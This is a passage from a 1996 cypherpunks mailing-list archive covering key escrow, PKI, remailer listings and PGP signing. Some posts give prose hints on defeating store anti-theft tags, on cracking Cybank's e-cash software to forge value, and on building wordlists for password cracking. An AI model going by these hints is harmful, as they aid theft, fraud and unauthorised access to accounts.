cU1zYUMxMGFMc0g1NDdCcFl4Z2tOdmkyYkwzQk9DcDNvNGVpdDI3UApXMkpG
dWVFMUJxeEd1UFR2citjTDJ5aHZzS1BnckNVVk9aemR6ekxrTjBNLzFnODg0
MDd3bEplUFhjbTRmd3V2CngyWEFuS3Ard0lFPQo9dFNCZgotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3943.1071713593.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jul 1996 17:04:44 +0800
To: cypherpunks@toad.com
Subject: Clueless "Attachment converted" uses
Message-ID: <ae0f1d14030210043edc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:48 AM 7/15/96, Gregory A Empey wrote:
>On Thu, 20 Jun 1996 10:55:29 -0800 jim bell <jimbell@pacifier.com>
>writes:
>>At 10:59 AM 6/20/96 -0400, Intense wrote:
>>>
>>>does not matter - it will be renewed in the interest of the
>>government
>>>The goverment want's there backdoor...  would you expect less?
>>
>>As far as I know, patents can't be "renewed."  I've heard they can be
>>"re-issued," amended, but to my knowledge that doesn't extend their
>>term.
>>
>>Jim Bell
>>jimbell@pacifier.com
>>
>
>
>Attachment converted: Macintosh HD:UUE.DOC (WDBN/MSWD) (0000FAD8)

OK, I _usually_ delete these "Attachment converted" messages, which
(fortunately) deletes the attachment in my "Attachments" folder, but for
some reason this time I fired up my word processor and opened the
attachment.

All I found was this crap:

"Hey, im ready to seriously f*ck-up MCI for no apparent
reason, and im also giving credit card (and calling
card) #'s away for no apparent reason, just reply to
skitzo@juno.com."

I urge people to NOT use attachments when ordinary plain text will
obviously work. There's a time and a place for richly formatted messages, a
la MIME, but not on a mailing list with heterogeneous platforms, mailers,
and varying graphics capabilities. Think of our mailing list as being like
Usenet, where graphics messages and oddball formats are frowned upon
(except in the binaries groups, and a few of the non-English language
groups).

And especially not clueless nonsense like this call for "fucking up MCI."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgevamp@juno.com (Gregory A Empey)
Date: Mon, 15 Jul 1996 15:10:12 +0800
To: jimbell@pacifier.com
Subject: Re: Current status of RSA patent...
In-Reply-To: <199606201757.KAA08100@mail.pacifier.com>
Message-ID: <19960714.224854.6742.1.EdGeVamp@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 20 Jun 1996 10:55:29 -0800 jim bell <jimbell@pacifier.com>
writes:
>At 10:59 AM 6/20/96 -0400, Intense wrote:
>>
>>does not matter - it will be renewed in the interest of the 
>government
>>The goverment want's there backdoor...  would you expect less?
>
>As far as I know, patents can't be "renewed."  I've heard they can be 
>"re-issued," amended, but to my knowledge that doesn't extend their 
>term.
>
>Jim Bell
>jimbell@pacifier.com
>

begin 644 UUE.DOC
M2&5Y+"!I;2!R96%D>2!T;R!S97)I;W5S;'D@9BIC:RUU<"!-0TD@9F]R(&YO
M(&%P<&%R96YT#0IR96%S;VXL(&%N9"!I;2!A;'-O(&=I=FEN9R!C<F5D:70@
M8V%R9"`H86YD(&-A;&QI;F<-"F-A<F0I(",G<R!A=V%Y(&9O<B!N;R!A<'!A
M<F5N="!R96%S;VXL(&IU<W0@<F5P;'D@=&\-"G-K:71Z;T!J=6YO+F-O;2X-
!"F5N
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyal Collins <lyalc@ozemail.com.au>
Date: Sun, 14 Jul 1996 23:20:29 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Cybank breaks new ground; rejects public-key encryption
In-Reply-To: <v03007606ae0dd5274a4e@[199.0.65.105]>
Message-ID: <31E9DCF8.43EA@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Actually, it doesn't take too much effort to discover them yourself.
Get a visual basic discomplier (VB version 4 compatible need, I think), 
and go for It.
I cracked version 1.5 of the Cybank software - I could load up an ".INI 
file" with as much "value" as I wanted.

Basically, they seem to convert ASCII characters to the decimal value of 
the hex code, then add, subtract etc on that value, along with some 
XOR'ing of the resulting string and an embedded table of data.
Oh, and it's all "locked" by the serial number, generated from the 
install date and time.
Yeah I trust it - not.

I hesitate to distribute the discomplied source code I used, asince it 
may get used by the unscrupulous to do trusting Cybank customers out of 
their hard earned money. Maybe, enough resquests will convince me 
otherwise.

Or, take a challenge, - it took me 6 hours to achieve this, including 
learing enough VB3 (ther version I cracked, 1.5 was in VB3).

Lyal 

-- 
All mistakes in this message belong to me - you should not use them!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clark <dockmaster@pobox.com>
Date: Mon, 15 Jul 1996 16:16:32 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <B0000041942@dns1.abcs.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: david@sternlight.com, jimbell@pacifier.com, cypherpunks@toad.com
Date: Sun Jul 14 23:08:09 1996
> At 4:48 PM -0700 7/14/96, jim bell wrote a typically argumentative
>  message.
> I've gotten wiser over time and don't plan to respond. I think both our
> positions are quite clear and readers may make up their own minds.
> 
> This post is a courtesy to others who may have been expecting more. It's
>  a
> one-time statement to this list, which I've just joined, of my current
> practice: Silence does not constitute assent.
> 
> David

More time required, apparently.

Professional liars will put anything in writing. Judas' Sheep, too.

Compromise is surrender. 


ec

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAgUBMenELqr9Bm6Zdjx5AQE4XQf+Je9KZ+3sVL+tACTfTxjqmnuzaq4XNvAN
oH92/O5f4ilWYomeacqXYuEmc7Owk2bAVIA3IO2ZxbbBBKkb8Gy4xILEVyzVC825
+FDccpwwNETkVWGaLcoo8h7FHuWnNTfVmQ23IyTo7lIYy7g3Fkr4KJPBac4BInv4
GRy5qazCrLMEXHT0VHOrNsi+cCejlGBQAkrwqWNFonNVr3+FpZY9+Yo8AZGWTiPY
d7yTWlFbAIANXLshSHatsVAb9uKTIzJeosGM9Hhq6hK9rYBXJhcfHat+7SkOKzJI
we6Hgg4D/TVzLmJAo3X8yUPDDDm9YyA2RbdF1FLZg6qzYr+vvSjuTg==
=2/4c
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Mon, 15 Jul 1996 21:03:56 +0800
To: "'cypherpunks@toad.com>
Subject: Defend Mail Bomb
Message-ID: <01BB7260.901F0700@ip134.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Is it possible to defend mail bomb? If not, detect who they are?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 15 Jul 1996 18:15:25 +0800
To: Michael Froomkin <lyalc@ozemail.com.au>
Subject: Re: Reasonable validation of a software package
Message-ID: <199607150634.XAA04547@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I expect this problem can usually be handled without formal CAs.  If you
publish your PGP key fingerprint in your advertising and make the key
available on your web page, then your users have a way of independently
verifying your key.  As the finger print appears in more and more places
(letterhead, product packaging, etc.), it is less and less likely that your
attacker can reach them all to modify them.

The important thing is diverse paths.  If you include your key in the
package with the product and print the fingerprint on the outside, it
becomes relatively easier for your attacker to replace the whole thing as
part of an attack.


At 11:33 AM 7/13/96 -0400, Michael Froomkin wrote:
>This illustrates the need for and role of certification authorities.
>
>See http://www.law.miami.edu/~froomkin/articles/trusted.htm  for some
>info.
>
>On Sat, 13 Jul 1996, Lyal Collins wrote:
>
>> This touches upon a favourite rant of mine.
>[...]
>> So, now you need to ensure that you can get your public key 
>> (to verify the digital signature with) in the hands of all 
>> your possible, or intended, recipients. 
>> 
>> Now the race is on for as many people as possible to generate 
>> PGP public keys/certificates bearing your name, or variations 
>> of it. Once that occurs, there is a fair chance that one of 
>> these keys will verfiy the digital signature on a piece of
>> software purportedly from you. Still, not many people will have 
>> your true PGP public key/certificate, but, them's the breaks.

-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 15 Jul 1996 18:18:49 +0800
To: "Deranged Mutant" <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <199607150634.XAA04562@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:05 PM 7/13/96 +0000, Deranged Mutant wrote:
>On 12 Jul 96 at 18:23, Bob Palacios posted:
>
>[Banner Snipped!]]
>>  CDT POLICY POST Volume 2, Number 27                        July 12, 1996
>[..]
>
>> Today's statement is essentially a re-statement of the Clipper III proposal
>> released in May.  Among other things, the Vice President:
>> 
>> *  Called for the liberalization of export controls provided computer
>>    users participate in a "global key management infrastructure"
>>    designed to make personal encryption keys accessible to law
>>    enforcement.
>
>This is particularly problematic... if the mainland Chinese gov't 
>requested a key from a N.Amercian or European (or even UN controlled) 
>escrow agency, who is to say it isn't really for political reasons 
>(even though they may claim the persons are drug smugglers)?
>
>Or what if the 'crime' was, say, discussing Mormon beliefs, which is 
>illegal in Singapore (and I think Russia as well)?
>
>Or what if some terrorist was using keys escrowed in a country that 
>sponsered terrorist acts?  

Deranged Mutant is absolutely right.  There are about 150 (or so)
governments in the world.  When people talk about making keys available to
government (or law enforcement), always ask, "Which governments can access
these keys?"  If I were a non-French corporation, I would feel distinctly
nervous if the answer included France.  (There are a number of other
countries where the security services have also been suspected of engaging
in industrial espionage.)


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Jul 1996 22:06:13 +0800
To: "Bruce M." <bkmarsh@feist.com>
Subject: Re: Can't block caller ID in Massachusetts?
Message-ID: <199607150749.AAA07568@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>> >     That is interesting as I don't recall ever being offered a choice of 
>> > toll free or being billed when I dial an 800 number (sometimes the only 
>> > number offered for a company).
>> I haven't noticed too many business telephones that don't appear in 
>> Directory Assistance.
>That is assuming that you know which area they are located in. 

There are businesses that _only_ list their 800 numbers, and you can't
find out the real phone number associated with them through directory
assistance.
It's especially annoying when they've got an in-state or other non-nation-wide
800 number, or when you're calling from outside the US, especially when
they're a business you'd like to be able to reach from anywhere, any time,
like the travel agent your office uses :-)  But it does make it hard to
call them directly for ANI-avoidance as well.  And they may _only_ have
the bank of phones that's got ANI service on it, and not have other phones.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Re-delegate Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Jul 1996 19:06:21 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607150749.AAA07573@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:38 PM 7/5/96 -0400, "Mark M." <markm@voicenet.com> wrote:
>OK, now the point of this message: somebody pointed out that if a binary was
>clear-signed using an option that would strip it down to 7 bits, the binary
>would be corrupted and therefore, such an option on PGP would be a Bad Thing.
>Then, I pointed out that not only would there be no point in a clear signature,
>since that would make the binary useless to someone without PGP anyway.  It
>is best to sign a binary and extract the certificate to a separate file, which
>you noted above.  So an option that would strip data down to 7 bits would not
>affect the ability to sign a binary.  Such an option would probably be a Good
>Thing.

Not everybody limits their language to the 96 characters supported by ASCII;
many people use languages that have umlauts and cedillas and accent marks
and haceks
and other inkblots above/under/around their letters, or symbols like
section markers and Yen and British Pound currency symbols.  A signature form
that trashes files down to 7 bits would not only annoy these people,
but also their readers :-)  

One readily obvious alternative - hashing only the lower 7 bits of each letter,
but not damaging the letter itself - is probably worse, because the message
can be altered by changing high bits without changing the signature,
while the shred-them-all method at least leaves you sure what you're signing.

But they're both pretty bad....

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Re-delegate Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Jul 1996 19:08:07 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Word lists for passphrases
Message-ID: <199607150749.AAA07579@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:43 PM 7/8/96 -0700, you wrote:
>If the purpose is for use with "Crack" or some similar program, it might be
>better than you would think.  You won't get the "unusual" words, but you
>will also get the words in common usage that do not appear in dictionaries.
>(Such as fnord, jedi, killfile, and the like...) 

"fnord" is in _my_ dictionary - can't you find it in yours?  :-)



>Another thing to look for when choosing dictionaries/wordlists for crack is
>not sticking to english.  If you have a userbase that is known to have a
>certain percentage of people of a non-english background, you will want to
>find lists of words from that background.  (I had a sysadmin asking me about
>Yiddish and Hebrew wordlists for just that reason.)  These can be a bit
>harder.  (Especially for unusual languages.)  

Grady Ward has his Moby Words databases with some of this kind of information.
In addition to the usual sets of languages, it's useful to include any
available lexicons of Elvish, Klingon, Unix, and other popular hacker-languages,
plus any names you can scam off MUDs, etc.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Re-delegate Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Jul 1996 22:23:13 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Metered Phone
Message-ID: <199607150749.AAA07586@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:19 PM 7/7/96 +0800, you wrote:
>Does anyone have any ideas about this metered phone? 
>I am from Philippines and heard some news that it will be 
>existing in 1997. Quite a big problem! Every dial will be counted, 
>every seconds will be measured...

That sounds like you're getting newer telephone technology.
In the US, most areas with newer telephone switches offer you
the choice of flat rate service (you pay a constant price per month
for calls in your city or other local area) or measured service
(you pay a lower price per month plus a few cents per minute
for local calls.)  In many places with measured service,
the phone company measures how much time you use for local calls,
but doesn't record who you call, only how many minutes.
For long-distance calls, which always charge for time,
they do record what number you call.

For computer users, there are two issues -
- recording who you call is, of course, bad 
- if you have flat rate telephone service, you can stay
connected to your Internet provider full time,
instead of calling up every N minutes or when you have mail.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Re-delegate Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 15 Jul 1996 12:56:08 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Stuffs used for detection
In-Reply-To: <1.5.4.32.19960714164618.008c35ac@193.246.3.200>
Message-ID: <Pine.LNX.3.94.960715005051.214A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 14 Jul 1996, Remo Pini wrote:

> Date: Sun, 14 Jul 1996 18:46:18 +0200
> From: Remo Pini <rp@rpini.com>
> To: cypherpunks@toad.com
> Subject: Re: Stuffs used for detection
> 
> At 09:52 PM 7/12/96 +0800, you wrote:
> >In our school library, there is a depository area wherein you deposit your
> things and get the tag. Since the library doesn't allow those tags to be
> brought out from the library, everytime you brought it out and pass by the
> door, it will alarm. Does anyone know what stuff is that? How come it is
> alarmed? I brought some metals but it wouldn't alarm... Why those tag would
> alarm them???
> >
> 
> Most of these systems are made of an oszillator (basically a few windings of
> a wire with a capacitor:
> 
>  ------
> /      \
> ¦--¦¦--¦
> \      /
>  ------
> 
> This acts like an ordinary RLC-Oszillator. When you put it in a electrical
> field with the right frequency, it will effect the field strong enough to be
> detectable.
> 
> So, if you shield it, you win.
>

The other type of those, the one that is used in music stores on CD's, is
done slightly (much) differently...

they use two peices of metalic foil shaped like this....
______
|     \
|______\

pointed in opposite directions, so as to look like this

_________
\ |      \
 \|_______\

when magnatized the two peices stick together, and will reflect a signal
on a harmonic of a specific wavelength of sound (the length of the total,
so that if they're not magnatized it won't reflect to the right
frequency), thus being easily detected.

these are actually fairly easy to fake or get past ;)

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMemW+TAJap8fyDMVAQE8vQf/U1Pfx2ejbkz8bVN1swVG3nVZGOmh5PGM
GdIG4ON2/hSOF8Ex9qJTSHvbLaJGCQnNnZhMGIrB4Y+S3qT7FyqPAfKBBMreLgNm
oV+yZdqwdyh7wRQnC9iXL8VLvBQTC1UjrwDq/47Os3j7s1gx2HVulvX3afG+Am7U
SlRnWxaYIkJADSAoevKE5Y1fv1GClDwA5cWmT1b9Y2T/wV0hj5YiP1pNMaAlPzBF
vmQelyA2Fo2zKPIUaFgEuYCde5jEQMaozmx+aladj6COc7vvGGiCa1mhSc9UZAum
lBpHKQ+NKPLOl7ovZk3rnrg+Z03kaHkvxRbhzuuveBaS2RxZBSUsGw==
=1BcU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 15 Jul 1996 14:03:15 +0800
To: cypherpunks@toad.com
Subject: PKI Documents
Message-ID: <199607150132.BAA27358@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   http://csrc.ncsl.nist.gov/pki/  
 
   ---------- 
 
   Public Key Infrastructure  
 
   Pardon our mess.  
 
   This page is under construction. Additional files, and 
   additional formats, will be added in the near future. Your 
   patience is appreciated! 
 
   The following documents are products of the Federal PKI 
   Steering Committee's Technical Working Group. Together, 
   they comprise Version 1 of the Technical Specifications for 
   the Federal PKI. 
 
   + Requirements for the Federal Public Infrastructure 
   (PostScript) [265366 bytes] This is Part A: of the 
   Technical Specifications, the Draft Requirements for the 
   Federal PKI. 
 
   + Technical Security Policy for the Federal PKI 
   (PostScript) [163543 bytes] This is Part B: of the 
   Technical Specifications, the Draft Technical Security 
   Policy for the Federal PKI. 
 
   + Proposed Federal PKI Concept of Operations (PostScript) 
   [980672 bytes] This is the Part C: of Technical 
   Specifications, the Concept of Operations for the Federal 
   PKI. 
 
   + Interoperability Profile (PostScript) [746328 bytes] This 
   is Part D: of the Technical Specifications, Draft 
   Interoperability Profiles for the Federal PKI. 
 
   Contractor Reports: the following reports were developed by 
   contractors for NIST. These reports do not constitute 
   government positions, but rather detail the advice and 
   guidance provided to the government regarding public key 
   infrastructure. 
 
   + The 1994 Mitre PKI Study Final Report. [1461396 bytes] 
   This report describes a federal PKI based on a strict 
   hierarchical architecture, using X.509 version 2 
   certificates. 
 
   + A Public Key Infrastructure for Unclassified but 
   Sensitive Applications. [946734 bytes] This 1995 report 
   describes a federal PKI based on a network architecture 
   using the X.509 version 3 certificate. 
 
   [End] 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 15 Jul 1996 14:35:56 +0800
To: cypherpunks@toad.com
Subject: GIB_ber
Message-ID: <199607150216.CAA08728@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-13-96. NYP: 
 
   Markoff: "Clinton Proposes Initiatives On the Scrambling of 
   Data." 
 
      Under increasing pressure from Congress and the computer 
      industry, the Clinton Administration proposed a series 
      of new data-scrambling policy initiatives yesterday that 
      it said would address the Government's national security 
      concerns while also permitting American companies to 
      compete more effectively overseas. 
 
   6-14-96. NYP: 
 
   William Gibson: "The Net Is a Waste of Time. And that's 
   exactly what's right about it." 
 
      The Web, in its clumsy, larval, curiously innocent way, 
      offers us the opportunity to waste time, to wander 
      aimlessly, to daydream about the countless other lives, 
      the other people, on the far sides of however many 
      monitors in that postgeographical meta-country we 
      increasingly call home. It will probably evolve into 
      something considerably less random, but in the meantime, 
      in its gloriously unsorted Global Ham Television 
      Postcard Universes phase, surfing the Web is a 
      procrastinator's dream. And people who see you doing it 
      might even imagine you're working. 
 
 
   http://pwp.usa.pipeline.com/~jya/gibber.txt  (13 kb for 2) 
 
   GIB_ber  (for 2) 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Mon, 15 Jul 1996 21:16:31 +0800
To: cypherpunks@toad.com
Subject: Organized Crime Home Page - Four Horsemen, No Waiting
Message-ID: <2.2.32.19960715092555.00699bd4@bah.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, with the UCMJ ( Uniform Code of Military Justice ) and the Oath of
Allegiance Military Personnel take on induction being re-written to Support
and defend the United Nations and to accept direct and lawful orders from UN
personnel, this doesn't surprise me.Soon, UN Secretary-General Boutros
Boutros-Ghali, or someone like him will repeal more of the amendments to our
constitution.  First our guns, then our code. 

I'll give up my pass phrase when
 they pry it from my cold dead fingers !

>Date: Sun, 14 Jul 1996 18:22:00 -0700
>From: Alan Bostick <abostick@netcom.com>
>Organization: Arrogant Opinions 'R' Us
>To: cypherpunks@toad.com
>Subject: Organized Crime Home Page - Four Horsemen, No Waiting
>X-URL: http://www.mywebsite.com:1080/cgi-bin/bvolmgr.cgi?BVpage=management
>Sender: owner-cypherpunks@toad.com
>
>Cypherpunks interested in establishment scaremongering are invited
>to take a look at the Organized Crime Home Page 
>(http://www.alternatives.com/crime/index.html), sponsored by a group
>called The Committee for a Safe Society, about the world-wide threat
>of organized crime.  Apparently every evil known to post-Cold-War
>society, even the bad weather in Chicago, is the responsibility of
>organized crime.  Now you know why governments need GAK.
>
>Alan-Bob says check it out.
>-- 
>Alan Bostick               | [Spielberg's] latest is TWISTER, a film that
>mailto:abostick@netcom.com | gives whole new meaning to the phrase "giant
>news:alt.grelb             | sucking sound."  -- Patrick Taggart
>http://www.alumni.caltech.edu/~abostick
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Mon, 15 Jul 1996 21:25:23 +0800
To: cypherpunks@toad.com
Subject: Questions from a Wannabe
Message-ID: <2.2.32.19960715094005.00697178@bah.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all, 
I have been reading all of the posts for a few days now and I have a couple
of questions, if someone has time.

In the event of GAk, how can we be forced to register our keys ?  We could
always scrounge some old outdated but functional TEMPEST equipment ....

and could someone please explain ITAR in a simple way for me ?

One last thing.. If I have the US PGP and a friend uses the export version,
I assume we are compatible, yes ?

Thanks all, 

Charles E. Sparks<sparks@bah.com>    
In God we trust, all others we encrypt !
http:/www.clark.net/pub/charley/index.htm
    Public Key At 
http://www.clark.net/pub/charley/cp_1.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 16 Jul 1996 03:28:25 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199607151350.GAA30751@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Sun 14 Jul 96 15:43:37 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              ****+++****+     5:01  99.99%
alumni   hal@alumni.caltech.edu           #-*##*#**##+     2:26  99.99%
jam      remailer@cypherpunks.ca          ***********+    17:16  99.99%
c2       remail@c2.org                    ++-++++++++-    57:40  99.99%
mix      mixmaster@remail.obscura.com     -+++++-+++--  2:50:34  99.98%
nymrod   nymrod@nym.jpunix.com            *#######+##+     2:21  99.98%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    40:00  99.97%
lucifer  lucifer@dhp.com                  ++++++++-+++    47:35  99.94%
flame    remailer@flame.alias.net         -+--++++-.--  7:31:14  99.93%
amnesia  amnesia@chardos.connix.com       ----+-+-----  3:12:29  99.86%
alpha    alias@alpha.c2.org               **++++*++**+    39:15  99.76%
ncognito ncognito@rigel.cyberpass.net     _-...-+_--.  14:56:48  99.69%
portal   hfinney@shell.portal.com         #-  ##*#+##+     2:08  99.46%
treehole remailer@mockingbird.alias.net   -+  + +--.-   3:43:44  98.98%
vegas    remailer@vegas.gateway.com       #*+#*+* * *   1:28:29  98.17%
penet    anon@anon.penet.fi               ...-  -----+ 11:48:28  94.51%
haystack haystack@holy.cow.net            * #+#-+*  #      4:49  91.21%
nemesis  remailer@meaning.com             ********+       20:19  76.01%
extropia remail@miron.vip.best.com        ---.----      6:01:00  51.75%
ecafe    cpunk@remail.ecafe.org            ###  ##        51:33  47.17%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
